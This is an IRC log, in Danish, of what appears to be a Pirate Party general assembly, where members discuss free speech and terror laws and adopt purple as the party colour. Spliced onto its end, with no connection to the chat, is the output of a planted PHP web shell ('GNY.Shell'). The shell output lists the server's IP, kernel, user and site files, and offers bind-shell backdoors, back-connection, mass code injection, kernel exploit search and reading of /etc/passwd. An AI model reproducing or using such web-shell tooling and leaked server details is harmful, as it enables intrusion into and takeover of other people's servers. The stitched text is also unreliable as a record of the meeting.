(17:04:51) rhoegh: Det falder tilbage p? grundlovens defination af ytringsfrihed. I den danske bliver der kun opereret med en formelt ret, uden materiel indhold. Indholdet bliver fastsat ved senere lov. Piratpartiet, burde kr?ver en gundlovs diskussion, hvor vi vil have en sk?rpelse af grundlovens reelle yrtringsfrihed. Hvor det kan blive sl?et fast at ytringsfrihed v?gte h?jere end copyright.
(17:05:53) oj: terrologivning en glidebane. i UK har man brugt terroloven til fastfrysning af islands ?konomi
(17:06:08) osh_DK1: Christian: Du har ret
(17:06:12) oj: iforb. med krtisen
(17:06:47) Christian: Fuldstændighed enig rhoegh, vi kan ofre folks privatliv på baggrund af erstatningsretssager vedr fil-deling
(17:07:33) osh_DK1: rhoegh: jeg er enig men er bange for grundlovsændringer med det nuværende politiske klima
(17:07:42) odenseaneren: et tydeligt eksempel på, at en lov der er indført med et spicifikt formål, bilver misbrugt til andre formål
(17:07:47) osh_DK1: men debatten er vigtig
(17:08:12) osh_DK1: JEg er enig med odenseaneren
(17:08:30) osh_DK1: Misbrug af terrorlovgivningen er et stort problem
(17:08:32) Christian: Grundlovsændringer er også en meeeget lang politisk proces og det kræver at vi får mere politisk magt for at kunne sætte den på dagsordnen
(17:08:36) rhoegh: netop, at rejse debatten kan v?re et m?l i sig selv.
(17:09:24) Christian: vi kan ikke*
(17:10:40) odenseaneren: i stedet for at lave en politireform, der gav politiet øget magt skulle have lavet en retsreform og indføre et demokratisk system som befolkningen kunne respektere
(17:12:09) oj: Bliver der lavet en log/referat over denne generlforsamling
(17:12:53) rhoegh: kun den myndighederne laver :-)
(17:12:56) osh_DK1: Jeg logger denne chat, og der og der bliver skrevet referat
(17:12:58) oj: hehe
(17:13:33) oj: Fedt det kommer p? partiets side?
(17:14:11) osh_DK1: Jeg synes det er essentielt at befolkningen kan respektere lovgivning og retssystem
(17:14:53) osh_DK1: Vi bør have gennemsigtiged i forvaltningen - staten skal være transparent for borgerne
(17:14:58) odenseaneren: jeg synes at et er altafgørende at myndighederne gør det
(17:15:12) osh_DK1: Borgerne skal have privatliv og ikke være transparente over for staten
(17:15:36) osh_DK1: Ja, naturligvis oj
(17:16:07) osh_DK1: Staten skal være bange for befolkningen - Befolkningen skal ikke være bange for staten
(17:17:36) osh_DK1: Ikke fordi jeg vil stoppe den politiske debat - den skal helst køre videre
(17:18:00) osh_DK1: Men måske skal vi lige tage næste punkt på dagsordenen først
(17:19:22) Christian: God ide.
(17:20:26) osh_DK1: 14. Øvrigt.
(17:20:53) osh_DK1: Under øvrigt vil jeg foreslå at landsmødet officielt vælger partifarve
(17:21:43) osh_DK1: Der har været drøftelser, og er vist enighed om, at vælge det svenske piratpartis farver som fores egne farver
(17:22:18) osh_DK1: Vi har samme partilogo, og partinavnet staves på præcist samme måde
(17:22:22) rhoegh: hvidt og sort?
(17:22:37) osh_DK1: Lilla.
(17:22:56) oj: Hvorfor lilla?
(17:23:24) osh_DK1: Se http://wiki.piratpartiet.se/grafiskprofil
(17:24:34) rhoegh: jeg syntes det ser lidt fesent ud.
(17:24:45) osh_DK1: Ingen andre partier har denne farve her i andet, og da den bruges af svenskerne er det langt lettere med (billigere) masseproduktion af materiale som klistermærker, bannere, trøjer og ligninde
(17:25:33) rhoegh: ok
(17:25:52) oj: ... hmmm ja der er fordele meen det skal vel ikke v?re det som er afg?rrende?
(17:26:26) odenseaneren: piratlilla er da flot
(17:26:29) Christian: Det er vigtigt at vise solidaritet med de andre piratpartier
(17:27:14) oj: ja ok... kan bare ogs? godt lide tanke im noget r?de.... blod og solidaritet
(17:27:46) odenseaneren: pirater har lilla blod i årerne
(17:27:56) rhoegh: Solidaritet, og f?lles front er meget vigtigt.
(17:28:26) oj: der kan man bare se... det vidste jeg ikke... men lilla er ogs? et ok valg
(17:28:56) Christian: Er heller ikke selv mega glad for den lilla farve, men farven betyder ikke at jeg vælger et andet parti :p
(17:29:07) oj: ening
(17:29:14) osh_DK1: Rød er allerede taget som farve for socialisterne
(17:29:49) oj: jaa men det handler det vel ogs? lidt om
(17:30:03) odenseaneren: der er ikke lange fra lilla til rødt
(17:30:23) osh_DK1: Lilla er en blanding af rødt og blåt
(17:30:54) osh_DK1: Både socialister og liberale kan tilslutte sig vores program
(17:31:16) odenseaneren: det kan så markere at vi ikke vælger side, og anbringer os i midten
(17:31:53) Christian: Vi kunne også vælge regnbue farve - så er vi dækket ind.
(17:32:32) ***lasg synes det lilla er paent
(17:32:36) oj: naaj s? er det vist noget andet vi signalere
(17:32:44) osh_DK1: JEg mener personligt ikke vi placerer os på midten. En-dimensionel politik, hvor man bare ser på hvor man er på højre/venstre aksen er fordummende
(17:32:58) osh_DK1: Jeg mener ikke vi kan placeres på denne akse
(17:33:55) rhoegh: enig, partiet skellet kan ikke bruges mere.
(17:33:57) Christian: Enig
(17:34:44) *odenseaneren left the room (quit: Connection reset by peer).*
(17:34:56) osh_DK1: Selvom spørgsmålene for denne akse stadig er vigtige, er de ikke længere de vigtigste. Spørgsmål om vore grndrettigheder er vigtigere
(17:35:09) lasg: Naar medierne kommer vaeltende tror jeg man bliver noedt til at forholde sig til den eksisterende politiske skala. (udover at sige at man synes den er foraeldet)
(17:35:33) *odenseaneren [/mogens_lau@--3CDB5BFE.adsl.cybercity.dk/] entered the room.*
(17:35:51) rhoegh: Realiseringen af et patentl?st og copyright frit samfund, kan b?de ses som en realisering af socialistisk, men ogs? et liberalt dr?mmesamfund.
(17:35:58) lasg: "Hvor ligger I rent politisk?" - "Uden for skalaen, for den er dum". Saa har man nok tabt en del folk.
(17:36:10) osh_DK1: netop rhoegh
(17:36:27) lasg: mja jeg ser piratpartiet noget socialliberalt
(17:36:36) rhoegh: Vi skal sige til medierne at vi tager udgangspunkt i opensource principperne
(17:37:17) osh_DK1: JEg forstår hvad du mener, lasg.
(17:37:35) osh_DK1: MEn vi er en helt ny politisk bevægelser
(17:37:56) osh_DK1: fordi vi er på vej ind i et nyt samfund: informationssamfundet
(17:38:39) osh_DK1: sidst det skete var ved den industrielle revolution, hvad vi gik fra landbrugs- til industrisamfundet
(17:38:57) osh_DK1: hvor, mener jeg
(17:39:23) rhoegh: Helt enige, vi skaber noget nyt. Vi skal fors?ge at lave institutionelt system som fordre samarbejde og ikke kontrol og hemmeligholdelse.
(17:39:27) osh_DK1: Dengang var den politiske akse mellem konservative og liberalister
(17:39:59) osh_DK1: Men da socialismen kom frem kunne de heller ikke placeres på denne akse
(17:40:13) lasg: mmm, paradigmeskift
(17:40:23) oj: netop
(17:40:24) rhoegh: Amen
(17:40:32) rhoegh: :-)
(17:42:04) osh_DK1: Er der enighed om valget af lilla som partifarve?
(17:42:10) Christian: Det er måske også et klogt valg i forhold til at kunne differentiere os fra de andre. Så slipper vi måske også fra alle de interviews om velfærdssamfund og hvordan lønposer bør ser ud.
(17:42:57) oj: jeg har ikke valgret men ok med mig...hovedsaligt af praktiske ?rsager....
(17:45:09) osh_DK1: Alle her er enige om lilla som partifarve, hvad siger odenseaneren?
(17:47:57) odenseaneren: vi tager lige en time-outok
(17:48:04) odenseaneren: ok
(17:48:27) rhoegh: ok
(17:48:46) oj: time-out ?
(17:48:49) osh_DK1: ok, da ingen stemmer imod må vi sige det er vedtaget.
(17:49:19) osh_DK1: Ja, vi skal også snart have en spisepause her
(17:49:22) odenseaneren: vi stemmer for
(17:49:39) oj: s? det bliver lilla og sort
(17:50:12) oj: eller lilla hvid?
(17:50:31) osh_DK1: Lilla, (lys og mørk) sort og hvidt, som http://wiki.piratpartiet.se/grafiskprofil
(17:51:29) oj: ja, men der er flere typer. men alts? skrift med hvid
(17:52:00) oj: ok sorry jeg er med
(17:52:08) osh_DK1: Ja, det er ikke så begrænset - det bør det heller ikke være
(17:53:01) osh_DK1: Er der andre forslag til punkter under "eventuelt"?
(17:56:37) Christian: Facebook til brede budskabet om piratpartiet ? Venter vi med det til at partiets politik er mere fastsat eller?
(17:57:24) oj: vi skal ikke lave en ny alliance
(17:57:29) odenseaneren: jeg har sat link på min Facebook side
(18:10:13) osh_DK1: Lad os bare udbrede budskabet så meget som muligt
(18:11:38) osh_DK1: Da der ikke er mere under eventuelt, og da vi ikke har flere punkter på programet, må vi sige at mødet er afsluttet
(18:11:49) osh_DK1: men lad debatten køre videre**

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.15 (CentOS). PHP/5.3.3
Kernel: Linux pet.piratpartiet.dk 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015
x86_64
Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 837.68 GB of 912.5 GB (91.8%)Server IP: 95.211.216.69 - Your IP: 54.147.134.218

/var/www/html/piratpartietdk/   drwxr-xr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (20 files and 9 folders):

Name [asc] Size Modify Owner/Group Perms Action
. LINK 26.09.2015 01:02:14 0/0 drwxr-xr-x [info] 
.. LINK 25.09.2015 23:34:19 0/0 drwxr-xr-x [info] 
[profiles] DIR 25.09.2015 23:37:34 0/0 drwxr-xr-x [info] 
[includes] DIR 25.09.2015 23:35:10 0/0 drwxr-xr-x [info] 
[modules] DIR 25.09.2015 23:37:08 0/0 drwxr-xr-x [info] 
[themes] DIR 25.09.2015 23:56:20 0/0 drwxr-xr-x [info] 
[misc] DIR 25.09.2015 23:35:24 0/0 drwxr-xr-x [info] 
[public_html] DIR 25.09.2015 23:37:35 0/0 drwxr-xr-x [info] 
[sites] DIR 25.09.2015 23:50:09 0/0 drwxr-xr-x [info] 
[partier_paa_sociale_medier] DIR 25.09.2015 23:37:32 0/0 drwxr-xr-x [info] 
[scripts] DIR 25.09.2015 23:37:36 0/0 drwxr-xr-x [info] 
 web.config 2 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 1.45 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 syslog 696 B 25.09.2015 23:56:12 0/0 -rw-r--r-- [info] [change] [download] 
 CHANGELOG.txt 73.16 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 README.txt 5.25 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.4 KB 25.09.2015 23:34:53 0/0 -rw-r--r-- [info] [change] [download] 
 update.php 18.96 KB 25.09.2015 23:56:23 0/0 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.05 KB 26.09.2015 01:02:14 0/0 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 8 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0104 ]:.